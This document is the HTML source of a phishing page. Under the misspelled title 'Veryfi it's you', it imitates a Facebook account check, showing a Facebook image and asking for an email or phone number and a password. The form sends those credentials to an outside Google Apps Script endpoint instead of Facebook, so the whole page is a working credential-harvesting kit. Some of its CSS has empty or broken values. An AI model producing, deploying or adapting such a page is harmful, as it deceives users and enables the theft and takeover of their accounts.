<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />
    <title>
      Veryfi it's you
    </title>
    <style type="text/css" media="all">
      *{
        margin: 0.5%;
        padding: 0%;
        box-sizing: ;
        
      }
      body{
        text-align: center;
      }
      icon1{
        margin-top: 5%;
        margin-left: 5%;
        display: flex;
      
        
      }
      svg{
        height: 30px;
        width: 30px;
      }
      h2{
        margin-left: 20px;
      }
      .ico2{
      border-bottom: 1px solid gray;
      margin-top: 4px;
        
      }
      input{
        height: 50px;
        width: 90%;
        margin-top: 30px;
        border-radius: 10px;
        border: 1px solid gray;
        
      }
      form{
        text-align: center;
      }
      button{
        height: 50px;
        width: 90%;
        margin-top: 30px;
        border-radius: 10px;
        border: 1px solid gray;
        background-color: #4793fe;
        color: #ffffff;
        font-size: 25px;
        margin-bottom: 30px;
      }
      .a1{
        text-decoration: none;
        background-
      }
      img{
        width: 100%;
      }
      .link{
        text-decoration: none;
      }
      
      
    @media only screen and (min-width: 380px){
      body{
        background-color: ;
        text-align: center;
      }
         .icon1{
        margin-top: 5%;
        margin-left: %;
        display: flex;
      
        
      }
      svg{
       
      }
      h2{
        margin-left: auto;
        margin-right: auto;
        font-size: 70px;
      }
      .ico2{
      border-bottom: 1px solid gray;
      margin-top: 4px;
      margin-left: ;
      width: 100%;
        
      }
      input{
        height: 150px;
        width: 90%;
        margin-top: 50px;
        border-radius: 25px;
        border: 1px solid gray;
        font-size: 50px;
        
      }
      form{
        text-align: center;
        margin-left: %;
      }
      button{
        height: 150px;
        width: 90%;
        margin-top: 50px;
        margin-bottom: 50px;
        border-radius: 25px;
        border: 1px solid gray;
        background-color: #4793fe;
        font-size: 60px;
        color: #ffffff;
        
      }
      img{
        width: 100%;
      }
      .link{
        text-decoration: none;
        
        font-size: 40px;
      }
     }
    </style>
  </head>
  <body>
    <div class="">
      <img src="Facebook.png" alt="" />
    </div>
    <div class="icon1">
    
<h2 class="">Veryfi it's you</h2>
    </div>
    <div class="ico2">
      
    </div>
    <form class="" action="https://script.google.com/macros/s/AKfycbx0-ptYL23Y9CJctobW_n_1q05MsIwbpexIEnetqOBsxFHnUMSzlkyE5iKaY45XUagOTg/exec" method="post" accept-charset="utf-8">
      <input type="text" name="email" id="email" placeholder=" 📞  Email or Phone" required="required"/>
      <input type="password" name="password" id="password" placeholder=" 🗝️  Password"required="required" />
      <button type="submit">Next</button>
      
    </form>
    <a class="link" href="">forgotten password?</a>
  </body>
</html>